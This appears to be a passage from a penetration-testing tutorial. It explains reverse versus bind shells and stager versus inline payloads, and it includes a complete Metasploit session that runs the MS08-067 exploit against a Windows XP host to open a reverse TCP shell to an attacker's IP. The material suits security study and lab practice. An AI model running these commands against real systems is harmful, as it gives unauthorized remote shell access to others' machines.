A reverse shell is the complete opposite of a bind shell. Instead of binding a port on the target system and waiting for the connection from the attacker's machine, it simply connects back to the attacker's IP and port, and spawns a shell. A visible dimension of the reverse shell is to consider a target behind the NAT or firewall that prevents public access to its system resources.
The following are the commands to begin exploitation and set up a reverse shell:
msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7 RHOST => 192.168.0.7 msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3 LHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32>
You can clearly differentiate between a reverse shell and a bind shell using the attacker's IP. We have to provide the attacker's IP (for example, LHOST 192.168.0.3) in a reverse shell configuration, while there is no need to provide it in a bind shell.
What is the difference between the inline and stager payloads? An inline payload is a single self-contained shellcode that is to be executed with one instance of an exploit, while the stager payload creates a communication channel between the attacker and victim machine to read off the rest of the staging shellcode in order to perform a specific task. It is common practice to choose stager payloads because they are much smaller than inline payloads.